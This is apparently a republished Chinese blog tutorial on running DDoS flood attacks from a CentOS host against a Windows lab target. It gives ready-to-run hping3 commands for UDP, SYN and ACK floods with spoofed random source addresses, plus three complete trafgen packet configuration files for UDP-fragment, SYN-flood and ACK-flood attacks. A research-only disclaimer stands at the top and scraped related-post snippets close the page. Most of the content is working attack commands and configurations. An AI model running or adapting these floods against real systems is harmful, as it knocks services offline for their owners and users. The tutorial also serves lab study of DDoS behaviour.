2. 程式人生 > >DDOS流量攻擊

DDOS流量攻擊

阿新 發佈:2018-11-03
宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!!!

實驗目的

學習基本的DDOS工具使用

hping3

netsniffer – trafgen

實驗環境

包含2臺主機

attact 作為攻擊方,使用Centos7.2

windows_server ,用於被攻擊,同時抓包分析流量 ,任意版本均可。安裝wireshark,用於抓包

實驗步驟

使用hping

hping官網幫助資訊

hping與ping的區別:典型的ping程式使用的是ICMP回顯請求來測試,而HPING可以使用任何IP報文,包括ICMP、TCP、UDP、RAWSOCKET

檢視幫助資訊

hping --help

1、使用hping3進行 udp flood攻擊

hping3 --flood --rand-source --udp -p 目標埠 目標IP 
hping3 --flood --rand-source --udp -c 100 -p 目標埠 目標IP

–flood : sent packets as fast as possible(儘可能快地傳送資料包)

–rand-source: random source address(隨機源IP地址)

–udp : UDP mode

-p –destport: destination port (default 0) (目標埠)

-c 100 傳送100個數據包,用於實驗,不加可能會宕機
執行命令時,抓包檢視傳送資料。並觀察目標機器網路

抓包結果:

1540446423341

靶機狀態:

![1540446645489](Picture/15在這裡插入圖片描述

2、使用hping 進行syn_flood攻擊

hping3 --flood –-rand-source -S -c 100 -p 目標埠 目標IP

-S:傳送SYN標記

攻擊後,在windows上使用 netstat -ano | find "SYN"命令,檢視現象

![1540447324931](Picture/15404在這裡插入圖片描述

3、使用hping 進行ack_flood攻擊

hping3 --flood –-rand-source -A -c 100 -p 目標埠 目標IP

-A:傳送ACK標記

試試同時發起syn_flood與ack_flood

同時發起兩種攻擊時,靶機情況

![1540448131109](Picture/154044在這裡插入圖片描述

使用netsniff的trafgen元件

實驗時,修改目的IP和mac地址即可。

4、使用trafgen進行udp 碎片攻擊

small_frag.traf為配置模板,需要修改 目標IP地址 目標埠 目標MAC地址等引數

trafgen --cpp --dev 介面名 --conf small_frag.traf -n 100 --verbose

–cpp Run packet config through C preprocessor

–conf 配置檔案

–dev 介面名,通過ifconfig可以檢視

–verbose 冗餘傳送

-n 100 傳送100個數據包,用於實驗,不加可能會宕機

實驗結果:

![1540452143959](Picture/154045在這裡插入圖片描述

![1540452187176](Pict在這裡插入圖片描述

5、使用trafgen進行syn_flood攻擊

trafgen --cpp --dev 介面名 --conf syn_flood.traf -n 100 --verbose

實驗結果

![1540451350027](Picture/15404513在這裡插入圖片描述
1540451410467

6、使用trafgen進行ack_flood攻擊

trafgen --cpp --dev 介面名 --conf ack_flood.traf -n 100 --verbose

攻擊結果:

1540451780045

1540451834483

試試同時發起syn_flood與ack_flood

安裝實驗工具hping3

wget https://github.com/antirez/hping/archive/master.zip

unzip master

cd hping-master

yum install libpcap-devel

ln -sf /usr/include/pcap-bpf.h /usr/include/net/bpf.h

yum -y install tcl tcl-devel

./configure

make && make install

參考:安裝hping的一些坑

安裝實驗工具 netsniff-ng

yum install netsniff-ng -y
trafgen的相關使用可以參考這個

hping 官方help

hping官網幫助資訊

附件1

small_frag.traf

/* UDP fragment DoS attack
 * Command example:
 *  trafgen --cpp --dev em2 --conf small_frag.trafgen --verbose
 * Note: dynamic elements "drnd()" make trafgen slower
 */
// trafgen packet conf for fragment DoS attack
// -------------------------------------------
//  - Need to randomize the frag ID
//  - Use trafgen support for dynamic checksum recalc
//
// Checksum cannot be fixed with iptables:
//   iptables -t mangle -I POSTROUTING -d 192.168.51.2 -j CHECKSUM --checksum-fill
// Because traffic is injected a place which don't have any NF hooks
//

{
  // --- Ethernet Header ---
  0x00, 0x0c, 0x29, 0x0e, 0xe4, 0xfe,  // MAC Destination
  0x90, 0xe2, 0xba, 0x0a, 0x56, 0xb4,  // MAC Source
  const16(0x0800), // Protocol

  // --- IP Header ---
  // IPv4 Version(4-bit) + IHL(4-bit), TOS
  0b01000101, 0x00,
  // IPv4 Total Len
  const16(40),

  // ID, notice runtime dynamic random
  drnd(2),

  // IPv4 3-bit flags + 13-bit fragment offset
  // 001 = More fragments
  0b00100000, 0b00000000,

  64, //TTL
  17, // Proto UDP

  // Dynamic IP Checksum (notice offsets are zero indexed)
  csumip(14, 33),

  192, 168, 164, 188, // Source IP
  192, 168, 164, 1, // Dest IP

  // --- UDP Header ---
  //  As this is a fragment the below stuff does not matter too much
  const16(48054), // src port
  const16(62148), // dst port
  const16(20),    // UDP length

  // UDP checksum can be dyn calc via csumudp(offset IP, offset TCP)
  //  which is csumudp(14, 34), but for UDP its allowed to be zero
  const16(0),

  // Payload
  'A',  fill(0x41, 11),
}

附件2

syn_flood.traf

/* TCP SYN attack ( 64byte )
 * Command example:
 *  trafgen --cpp --dev em2 --conf synflood.trafgen --verbose
 * Note: dynamic elements "drnd()" make trafgen slower
 */

#define ETH_P_IP	0x0800

#define SYN		(1 << 1)
#define ACK		(1 << 4)
#define ECN		(1 << 6)

{
  /* --- Ethernet Header --- */
  /* NEED ADJUST */
  0x00, 0x0c, 0x29, 0x0e, 0xe4, 0xfe,  # MAC Destination
  0x00, 0x12, 0xc0, drnd(3),  # MAC Source
  
  const16(ETH_P_IP),
  /* IPv4 Version, IHL, TOS */
  0b01000101, 0,
  /* IPv4 Total Len */
  const16(46),
  /* IPv4 Ident */
  drnd(2),
  //const16(2),

  /* IPv4 Flags, Frag Off */
  0b01000000, 0,
  /* IPv4 TTL */
  64,
  /* Proto TCP */
  0x06,
  /* IPv4 Checksum (IP header from, to) */
  csumip(14, 33),

  /* NEED ADJUST */
  10, 10, 88, drnd(1), # Source IP
  192, 168, 164, 1, # Dest IP

  /* TCP Source Port */
  drnd(2),
  /* TCP Dest Port */
  const16(1033),
  /* TCP Sequence Number */
  drnd(4),
  /* TCP Ackn. Number */
  const32(0), /* NOTICE ACK==zero with SYN packets */

  /* TCP Header length + Flags */
  //const16((0x5 << 12) | SYN | ECN)	/* TCP SYN+ECN Flag */
  //const16((0x5 << 12) | SYN | ACK)	/* TCP SYN+ACK Flag */
  const16((0x5 << 12) | SYN)		/* TCP SYN Flag */
  //const16((0x5 << 12) | ACK)		/* TCP ACK Flag */

  /* Window Size */
  const16(16),
  /* TCP Checksum (offset IP, offset TCP) */
  csumtcp(14, 34),
  const16(0), /*PAD*/
  
  /* Data */
  "SYNswf"
}

附件3

ack_flood.traf

/* TCP ACK attack ( 64byte )
 * Command example:
 *  trafgen --cpp --dev em2 --conf ackflood.trafgen --verbose
 * Note: dynamic elements "drnd()" make trafgen slower
 */

#define ETH_P_IP	0x0800

#define SYN		(1 << 1)
#define ACK		(1 << 4)
#define ECN		(1 << 6)

{
  /* --- Ethernet Header --- */
  /* NEED ADJUST */
  0x00, 0x0c, 0x29, 0x0e, 0xe4, 0xfe,  # MAC Destination
  0x00, 0x12, 0xc0, drnd(3),  # MAC Source
  
  const16(ETH_P_IP),
  /* IPv4 Version, IHL, TOS */
  0b01000101, 0,
  /* IPv4 Total Len */
  const16(46),
  /* IPv4 Ident */
  drnd(2),
  //const16(2),

  /* IPv4 Flags, Frag Off */
  0b01000000, 0,
  /* IPv4 TTL */
  64,
  /* Proto TCP */
  0x06,
  /* IPv4 Checksum (IP header from, to) */
  csumip(14, 33),

  /* NEED ADJUST */
  10, 10, 88, drnd(1), # Source IP
  192, 168, 164, 128, # Dest IP

  /* TCP Source Port */
  drnd(2),
  /* TCP Dest Port */
  const16(80),
  /* TCP Sequence Number */
  drnd(4),
  /* TCP Ackn. Number */
  drnd(4),

  /* TCP Header length + Flags */
  //const16((0x5 << 12) | SYN | ECN)	/* TCP SYN+ECN Flag */
  //const16((0x5 << 12) | SYN | ACK)	/* TCP SYN+ACK Flag */
  //const16((0x5 << 12) | SYN)		/* TCP SYN Flag */
  const16((0x5 << 12) | ACK)		/* TCP ACK Flag */

  /* Window Size */
  const16(16),
  /* TCP Checksum (offset IP, offset TCP) */
  csumtcp(14, 34),
  const16(0), /*PAD*/
  
  /* Data */
  "ACKswf"
}

相關推薦

DDOS流量攻擊

宣告:本實驗教程僅供研究學習使用,請勿用於非法用途,違者一律自行承擔所有風險!!! 實驗目的 學習基本的DDOS工具使用 hping3 netsniffer – trafgen 實驗環境 包含2臺主機 attact 作為攻擊方,使用Cen

什麼是高防伺服器?如何搭建DDOS流量攻擊防護系統

關於高防伺服器的使用以及需求,從以往的聯眾棋牌到目前發展迅猛的手機APP棋牌,越來越多的遊戲行業都在使用高防伺服器系統,從2018年1月到11月,國內棋牌運營公司發展到了幾百家。 棋牌的玩法模式從之前的買賣遊戲幣賺錢差額,到現在的4個人邀請到同一個房間裡玩麻將,抽取房間的費用,然後代理拉代理的方式開一個遊戲

雲計算之路-阿裏雲上:攻擊又來了,4個IP分別遭遇超過30G的流量攻擊

text htm 依次 lan cmt news 遭遇 target 正常 繼5月13日下午被攻擊之後,今天下午,攻擊又肆無忌憚地來了,14:35、14:39、14:40、14:41 ,依次有4個IP遭遇超過30G的流量攻擊,被阿裏雲“雲盾”關進

怎麽從優選擇死扛大流量攻擊,大型棋牌遊戲高防服務器

系統 出口 一定的 備案 美的 工作 機房 重要 維修 需要大型棋牌遊戲高防服務器可咨詢QQ:2881375115 需要大型棋牌遊戲高防服務器可咨詢電話:17759186719 大型棋牌遊戲高防服務器 大型棋牌遊戲高防服務器

誰遭到過ddos攻擊怎麽才能有效預防DDOS/CC攻擊

ddos攻擊 預防ddos cc攻擊關鍵詞:遭到ddos攻擊 有效預防 DDOS/CC攻擊 簡介:隨著網絡攻擊的簡單化,如今ddos攻擊已經不止出現在大型網站中,就連很多中小型網站甚至是個人網站往往都可能面臨著被DDoS攻擊的的風險。或許很多站長對DDoS攻擊並不是很了解,及時網站被攻擊時往往不能及時發

通過python的dnspython模塊實現DNS流量攻擊

python調用 opc 回來 attack als code count 是個 pro 一、   我是個菜B,慢慢摸索學習中。   安裝模塊 pip install dnspython   使用python調用dnspython模塊,寫了一個dns攻擊的小程序,目標I

永恒之塔私服高防服務器 高防無死角 死扛大流量攻擊

高防服務器萊昂內爾·安德列斯·梅西(西班牙語:Lionel Andrés Messi),1987年6月24日生於阿根廷聖菲省羅薩裏奧,綽號“新馬拉多納”,阿根廷著名足球運動員,司職前鋒、邊鋒和前腰,現效力於西班牙足球甲級聯賽巴塞羅那足球俱樂部。 歡迎咨詢本人QQ8803582 Tel: 1990690757

什麼是高防伺服器?如何搭建DDOS流量***防護系統

關於高防伺服器的使用以及需求,從以往的聯眾×××到目前發展迅猛的手機APP×××,越來越多的遊戲行業都在使用高防伺服器系統,從2018年1月到11月,國內×××運營公司發展到了幾百家。 ×××的玩法模式從之前的買賣遊戲幣賺錢差額,到現在的4個人邀請到同一個房間裡玩麻將,抽取房間的費用,然後代理拉代理的方式開

放大倍數超5萬倍的Memcached DDoS反射攻擊,怎麼破?

歡迎大家前往騰訊雲+社群,獲取更多騰訊海量技術實踐乾貨哦~ 本文由騰訊遊戲雲發表於雲+社群專欄 背景:Memcached攻擊創造DDoS攻擊流量紀錄 近日,利用Memcached伺服器實施反射DDoS攻擊的事件呈大幅上升趨勢。DDoS攻擊流量首次過T,引發業界熱烈迴應。現騰訊遊戲雲回溯整個事件如下: 追溯

DDOS攻擊與防禦

DDoS的攻擊與防禦 DoS攻擊與DDos攻擊的區別 Dos(Denial of Service 拒絕服務攻擊): ​ 短時間內對目標伺服器產生大量請求,使伺服器鏈路擁塞或忙於處理攻擊請求,導致服務暫時中斷或停止,導致其正常使用者無法訪問。 DDoS(Dist

[2015.6.1]UPYUN連續遭遇兩次大規模流量攻擊,影響業務6小時

尊敬的 UPYUN 客戶: 您好,UPYUN 服務出現故障,現就具體情況向您說明: 6 月 1 日 21:50 左右,UPYUN 監控報警,資料中心流量突增。客戶端出現上傳失敗、FTP 連線失敗、訪問 502 等錯誤情況。我們第一時間進行冗餘資源的調配、分流請求,API 上傳服務於 6 月 2 日凌

三人被起訴 自學流量攻擊技術攻擊網站敲詐勒索

濟南市公安局歷下區分局9日通報稱,近日,歷下警方打掉一個購買DDOS流量攻擊工具攻擊網站並實施敲詐勒索的網際網路涉黑惡犯罪團伙。該團伙作案覆蓋全國各地網站,此三名犯罪嫌疑人已被起訴至檢察機關。 2018年7月,濟南歷下警方接到山東某網路公司負責人報警稱:2018年7月13日至7月29日期間,其公司所屬的某平

全國首例!阿里安全技術協助警方打掉最新型DDoS網路攻擊平臺

阿里協助景寧警方打掉國內首個從事新型DDoS攻擊的網路黑灰團伙利用少量頻寬即可發起巨量DDoS攻

linux被ddos&&cc攻擊解決例項

原文地址:http://www.anquan.us/static/drops/tips-2457.html 這兩天一個客戶反映自己的網站經常出現mysql 1040錯誤,他的線上使用者才不到一千,mysql配置也沒問題,vps用的時linode160+刀一個月的。 沒

DDOS核彈攻擊--Memcached放大攻擊復現

情景:當有一個Request過來後,Web伺服器交給APP伺服器,APP處理並從Database中存取相關資料,但Database存取的花費是相當高昂的。特別是每次都取相同的資料,等於是讓資料庫每次都在做高耗費的無用功。如果APP拿到第一次資料並存到記憶體裡,下次讀取時直接從

網站被劫持攻擊以及流量攻擊如何解決

目前越來越多的伺服器被DDOS流量攻擊,尤其近幾年的DNS流量攻擊呈現快速增長的趨勢,DNS受眾較廣,存在漏洞,容易遭受到攻擊者的

實戰分享:如何成功防護1.2T國內已知最大流量DDoS攻擊

流量攻擊 一個 來源 設計 CP 反射 生命線 中國聯通 資源 作者:騰訊雲宙斯盾安全團隊&騰訊安全平臺部 引言: DDoS攻擊勢頭愈演愈烈,除了攻擊手法的多樣化發展之外,最直接的還是攻擊流量的成倍增長。3月份國內的最大規模DDoS攻擊紀錄還停留在數百G規模,4

防大流量DDOS攻擊DDOS應該怎麼防禦

DDOS的產生 DDOS 最早可追述到1996年最初,在中國2002年開始頻繁出現,2003年已經初具規模。近幾年由於寬頻的普及,很多網站開始盈利,其中很多非法網站利潤巨大,造成同行之間互相攻擊,還有一部分人利用網路攻擊來敲詐錢財。同時windows 平臺的漏洞大量的被公

大數據DDos檢測——DDos攻擊本質上是時間序列數據,t+1時刻的數據特點和t時刻強相關,因此用HMM或者CRF來做檢測是必然! 和一個句子的分詞算法CRF沒有區別!

科學 設計 區別 背景 file 最優化 model 安全 學習 DDos攻擊本質上是時間序列數據,t+1時刻的數據特點和t時刻強相關,因此用HMM或者CRF來做檢測是必然!——和一個句子的分詞算法CRF沒有區別!註:傳統DDos檢測直接基於IP數據發送流量來識別,通過硬件

ddos(分布式拒絕服務)攻擊防禦措施

scsi 硬盤 數據 訪問 充足 若是 配置防火墻 計算 路由器 總體來說,對DoS和DDoS的防範主要從下面幾個方面考慮: 盡可能對系統加載最新補丁,並采取有效的合規性配置,降低漏洞利用風險; 采取合適的安全域劃分,配置防火墻、入侵檢測和防範系統,減緩攻擊。